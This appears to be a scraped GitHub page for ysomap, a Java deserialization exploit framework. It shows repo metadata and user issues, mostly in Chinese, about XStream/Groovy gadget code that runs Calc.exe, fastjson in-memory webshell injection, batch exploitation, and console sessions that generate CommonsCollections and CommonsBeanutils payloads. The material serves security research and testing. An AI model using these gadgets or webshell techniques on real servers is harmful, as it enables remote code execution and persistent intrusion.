wh1t3p1g / ysomap Goto Github PK

View Code? Open in Web Editor NEW

1.1K 29.0 148.0 1.58 MB

A helpful Java Deserialization exploit framework.

License: Apache License 2.0

Java 100.00%

java-deserialization exploitation-framework

ysomap's People

Contributors

Stargazers

Watchers

Forkers

harry1080 marsmanchina lucifaer functfan p1v07 feisec xiaoshuier sec99 yangbh cyal1 monopole-zh pentest-toolz gavz bingpo 5l1v3r1 want2live233 raystyle log4she11 starl23 qiqingshiwo hjk201960 agelovito fa1c0n1 celebrate-future icysun crackercat y360u kaizhiyu d1sabl4 hywz36 sv3nbeast silentsoul04 re-expoc 20200629 huangzccn lz2y useafter secjia rdpmind rank0 changheluor007 hackdou wrysunny j5s gamblingmaster2020 jasonlou jeromeyoung tdr130 yyming-sudo exi1sh0w wenongs gysf666 cream-sec depycode sf197 yilucode awwzc dolt131943 haroldyong yuatat ajisai-babu lyrhy avaudioplayer dummykitty gaogaostone deidarayu badguy0827 dingxiao77 liehu koushui minhangxiaohui g0doot coollllllll tga0 anquanzhu andy0619 tyskill honeypothoneypot beichendream sesyi hackerxj007 polling-repo-continua yshdxm q-a-z gh-jy jadef1ee 0r3ak pear1y ofalwl bbbfkl b1ngda0 cokebeer su-404 rongqinglee crypt0nx riijj jkana vanirxxx bravery9 tdyj

ysomap's Issues

新功能建议

进行批量目标的漏洞验证或者利用, 当然, 爆破也是可以的.

Example:

java -jar ysomap.jar <exploit> [<payload>] [<bullets>] var1=vul1 var2=vul2 var3=vull3

请问一下如何HashMap通过反射修改put方法,put进去的key

我个人根据你的blog复现https://blog.0kami.cn/2020/04/18/java/talk-about-xstream-deserialization/ Groovy Expando这个方式的时候自己写的代码是这样的MethodClosure methodClosure=new MethodClosure("Calc.exe","execute");
Expando expando=new Expando();
expando.setProperty("hashCode",methodClosure);

    HashMap map=new HashMap();
    map.put("test",expando);
    Field key=Class.forName("java.util.HashMap$Node").getDeclaredField("key");
    key.setAccessible(true);
    key.set(map,expando);
    XStream xStream=new XStream();
    String xml=xStream.toXML(map);
    System.out.println(xml);
    xStream.fromXML(xml);
    我发现这个key是无法修改的因为是final类型，但是我发现如果put的时候直接放入expando对象的化会提前触发命令执行，这里我无法解决这个问题看了看你这个项目里的代码我不明白你的makemap 方法为何要如此处理

使用payload生成时提示com.thoughtworks.xstream.converters.ConversionException: Security alert. Marshalling rejected.

你好，在使用payload(ImageIO) bullet(JdbcRowSetImplBullet)时报错如下

java版本
openjdk version "1.8.0_342"
OpenJDK Runtime Environment (build 1.8.0_342-8u342-b07-0ubuntu1~20.04-b07)
OpenJDK 64-Bit Server VM (build 25.342-b07, mixed mode)

请问一下，如何对fastjson注入一个内存马

fastjson不出网可以用BCEL执行命令回显，不是tomcat环境，怎么注入一个内存马

Hessian XString deserialisation stack trace

When using several of the Hessian deserialisation payloads against a hessian endpoint, the tomcat server responds with the following stack trace:

java.lang.ClassCastException: com.sun.org.apache.xpath.internal.objects.XString cannot be cast to java.lang.String
	javax.naming.ldap.Rdn$RdnEntry.getValueComparable(Rdn.java:481)
	javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:444)
	javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:420)
	java.util.TreeMap.put(TreeMap.java:568)
	java.util.TreeSet.add(TreeSet.java:255)
	com.caucho.hessian.io.CollectionDeserializer.readList(CollectionDeserializer.java:78)
	com.caucho.hessian.io.SerializerFactory.readList(SerializerFactory.java:341)
	com.caucho.hessian.io.Hessian2Input.readObject(Hessian2Input.java:1945)
	com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:131)
	com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:109)
	com.caucho.hessian.server.HessianServlet.service(HessianServlet.java:396)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)

CommonsCollections3 生成POC时出现 Bullet Type Not Match 错误

ysomap > use payload CommonsCollections3

You can choose bullets: [TransformerBullet, TransformerWithJNDIBullet, TransformerWithSleepBullet, TransformerWithURLClassLoaderBullet, TransformerWithFileWriteBullet]

ysomap payload(CommonsCollections3) > use bullet TransformerBullet
ysomap payload(CommonsCollections3) bullet(TransformerBullet) > set command whoami
ysomap payload(CommonsCollections3) bullet(TransformerBullet) > run

[+] generate CommonsCollections3 success, plz seepayload.CommonsCollections3.TransformerBullet.ser
[+] generate payload(CommonsCollections3) started!

Bullet Type Not Match; Error TYPE: class [Lorg.apache.commons.collections.Transformer;

使用TransformerWithSleepBullet 和 TransformerBullet 都是提示错误 “Bullet Type Not Match”

ysomap payload(CommonsBeanutils1) bullet(ProcessBuilderBullet) > run
[+] generate payload(CommonsBeanutils1) started!
[+] generate payload(CommonsBeanutils1) done!
[+] generate CommonsBeanutils1 success, plz see obj.ser
java.io.NotSerializableException: java.lang.ProcessBuilder
        at java.io.ObjectOutputStream.writeObject0(Unknown Source)
        at java.io.ObjectOutputStream.writeObject(Unknown Source)
        at java.util.PriorityQueue.writeObject(Unknown Source)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
        at java.lang.reflect.Method.invoke(Unknown Source)
        at java.io.ObjectStreamClass.invokeWriteObject(Unknown Source)
        at java.io.ObjectOutputStream.writeSerialData(Unknown Source)
        at java.io.ObjectOutputStream.writeOrdinaryObject(Unknown Source)
        at java.io.ObjectOutputStream.writeObject0(Unknown Source)
        at java.io.ObjectOutputStream.writeObject(Unknown Source)
        at ysomap.core.serializer.DefaultSerializer.serialize(DefaultSerializer.java:25)
        at ysomap.core.serializer.SerializerFactory.serialize(SerializerFactory.java:52)
        at ysomap.cli.Session.run(Session.java:213)
        at ysomap.cli.Console.dispatch(Console.java:127)
        at ysomap.cli.Console.run(Console.java:77)
        at ysomap.cli.App.main(App.java:17)
ysomap payload(CommonsBeanutils1) bullet(ProcessBuilderBullet) > show options

可以在 Release 里面提供一个编译好的 jar 包吗😂

我的同学在 Mac 上面没编译成功，但是在我的 Win 上面成功了，jar 包拷过去也可以正常使用
开发者大大不如下次直接在 Release 标签里面放一个编译好的 jar 包？